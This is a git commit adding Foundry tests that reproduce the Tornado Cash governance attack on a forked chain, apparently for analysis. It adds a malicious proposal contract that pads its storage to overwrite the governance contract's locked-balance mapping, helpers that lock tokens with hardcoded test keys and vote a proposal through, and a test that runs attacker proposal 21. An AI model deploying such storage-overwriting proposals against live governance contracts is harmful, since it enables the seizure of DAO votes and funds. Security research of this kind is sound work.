Add tests to adding TORNs directly to stake via malicious proposal

This commit is contained in:
Theo 2023-05-23 01:13:35 +03:00
parent bf6836ffb2
commit 0d629f2e21
5 changed files with 175 additions and 9 deletions

@ -0,0 +1,15 @@
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
import "@interfaces/IERC20.sol";
import "@proprietary/Mock.sol";
contract SetStakeDirectlyProposal is Mock {
uint256[59] private _pad;
mapping(address => uint256) private _balances;
function executeProposal() external {
_balances[ADDRESS_TO_STAKE] = STAKE_AMOUNT;
}
}

@ -3,5 +3,21 @@ pragma solidity 0.8.17;
interface IGovernance {
function lockedBalance(address account) external view returns (uint256);
function propose(
address target,
string memory description
) external returns (uint256);
function castVote(uint256 proposalId, bool support) external;
function lock(
address owner,
uint256 amount,
uint256 deadline,
uint8 v,
bytes32 r,
bytes32 s
) external;
function execute(uint256 proposalId) external payable;
}

44
src/proprietary/Mock.sol Normal file

@ -0,0 +1,44 @@
pragma solidity 0.8.17;
contract Mock {
uint256 constant TEST_PRIVATE_KEY_ONE =
0x66ddbd7cbe4a566df405f6ded0b908c669f88cdb1656380c050e3a457bd21df0;
uint256 constant TEST_PRIVATE_KEY_TWO =
0xa4c8c98120e77741a87a116074a2df4ddb20d1149069290fd4a3d7ee65c55064;
address constant TEST_ADDRESS_ONE =
0x118251976c65AFAf291f5255450ddb5b6A4d8B88;
address constant TEST_ADDRESS_TWO =
0x63aE7d90Eb37ca39FC62dD9991DbEfeE70673a20;
address constant ADDRESS_TO_STAKE =
0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045;
uint256 constant STAKE_AMOUNT = 100_000 ether;
uint256 constant PROPOSAL_DURATION = 7 days;
uint256 constant PROPOSAL_THRESHOLD = 25000 ether;
string constant PROPOSAL_DESCRIPTION =
"{title:'Proposal #22: Test clone of 21 proposal: change locked stake balance directly',description:''}";
address constant VERIFIER_ADDRESS =
0x77777FeDdddFfC19Ff86DB637967013e6C6A116C;
bytes32 constant PERMIT_TYPEHASH =
keccak256(
"Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"
);
bytes32 constant EIP712_DOMAIN =
keccak256(
abi.encode(
keccak256(
"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"
),
keccak256(bytes("TornadoCash")),
keccak256(bytes("1")),
1,
VERIFIER_ADDRESS
)
);
uint16 constant PERMIT_FUNC_SELECTOR = uint16(0x1901);
}

@ -2,14 +2,11 @@ pragma solidity 0.8.17;
contract Parameters {
// Beneficary addresses
address public _governanceAddress =
address constant _governanceAddress =
0x5efda50f22d34F262c29268506C5Fa42cB56A1Ce;
address public _governanceVaultAddress =
address constant _governanceVaultAddress =
0x2F50508a8a3D323B91336FA3eA6ae50E55f32185;
address public _tokenAddress = 0x77777FeDdddFfC19Ff86DB637967013e6C6A116C;
// Proposals info
uint256 public PROPOSAL_DURATION = 7 days;
address constant _tokenAddress = 0x77777FeDdddFfC19Ff86DB637967013e6C6A116C;
// Attacker info - proposal, addresses
uint256 _attackerProposalId = 21;

@ -4,11 +4,14 @@ import "@interfaces/IGovernance.sol";
import "@interfaces/IERC20.sol";
import "@proprietary/Parameters.sol";
import "@proprietary/Mock.sol";
import "@root/SetStakeDirectlyProposal.sol";
import "@forge-std/Test.sol";
import "@forge-std/console2.sol";
contract ProposalTest is Test, Parameters {
contract ProposalTest is Test, Parameters, Mock, SetStakeDirectlyProposal {
IGovernance internal governance = IGovernance(_governanceAddress);
uint256 internal currentGovernanceVaultBalance =
getGovernanceVaultBalance();
@ -19,12 +22,22 @@ contract ProposalTest is Test, Parameters {
checkResults();
}
function testProposal() public conditionStateChecks {
function testExistentHackerProposal() public conditionStateChecks {
waitUntilVotingEnds();
governance.execute(_attackerProposalId);
}
function getAttackerLockedBalance() internal returns (uint256) {
function testMockSetStakeDirectlyProposal() public {
uint256 testSetStakeProposalId = voteAndCreateProposal(
address(new SetStakeDirectlyProposal())
);
waitUntilVotingEnds();
governance.execute(testSetStakeProposalId);
require(governance.lockedBalance(ADDRESS_TO_STAKE) == STAKE_AMOUNT);
}
function getAttackerLockedBalance() internal view returns (uint256) {
uint256 attackerLockedBalance;
for (uint i = 0; i < _attackerAddresses.length; i++) {
uint256 lockedBalance = governance.lockedBalance(
@ -44,6 +57,86 @@ contract ProposalTest is Test, Parameters {
vm.warp(block.timestamp + PROPOSAL_DURATION);
}
function voteAndCreateProposal(
address proposalAddress
) public returns (uint256) {
retrieveAndLockBalance(
TEST_PRIVATE_KEY_ONE,
TEST_ADDRESS_ONE,
PROPOSAL_THRESHOLD
);
retrieveAndLockBalance(TEST_PRIVATE_KEY_TWO, TEST_ADDRESS_TWO, 1 ether);
/* ----------PROPOSER------------ */
vm.startPrank(TEST_ADDRESS_ONE);
uint256 proposalId = IGovernance(_governanceAddress).propose(
proposalAddress,
PROPOSAL_DESCRIPTION
);
// TIME-TRAVEL
vm.warp(block.timestamp + 6 hours);
IGovernance(_governanceAddress).castVote(proposalId, true);
vm.stopPrank();
/* ------------------------------ */
/* -------------VOTER-------------*/
vm.startPrank(TEST_ADDRESS_TWO);
IGovernance(_governanceAddress).castVote(proposalId, true);
vm.stopPrank();
/* ------------------------------ */
return proposalId;
}
function retrieveAndLockBalance(
uint256 privateKey,
address voter,
uint256 amount
) internal {
uint256 lockTimestamp = block.timestamp + PROPOSAL_DURATION;
bytes32 messageHash = keccak256(
abi.encodePacked(
PERMIT_FUNC_SELECTOR,
EIP712_DOMAIN,
keccak256(
abi.encode(
PERMIT_TYPEHASH,
voter,
_governanceAddress,
amount,
0,
lockTimestamp
)
)
)
);
/* ----------GOVERNANCE------- */
vm.startPrank(_governanceAddress);
IERC20(_tokenAddress).transfer(voter, amount);
vm.stopPrank();
/* ----------------------------*/
(uint8 v, bytes32 r, bytes32 s) = vm.sign(privateKey, messageHash);
/* ----------VOTER------------ */
vm.startPrank(voter);
IGovernance(_governanceAddress).lock(
voter,
amount,
lockTimestamp,
v,
r,
s
);
vm.stopPrank();
/* ----------------------------*/
}
function checkCurrentState() internal {
console2.log(
"Current attacker locked balance: %s TORN",
@ -58,6 +151,7 @@ contract ProposalTest is Test, Parameters {
function checkResults() internal {
uint256 attackerBalanceAfterProposalExecution = getAttackerLockedBalance();
uint256 governanceVaultBalanceAfterProposalExecution = getGovernanceVaultBalance();
console2.log(
"Attacker locked balance after proposal 21 execution: %s TORN",
attackerBalanceAfterProposalExecution / 10 ** 18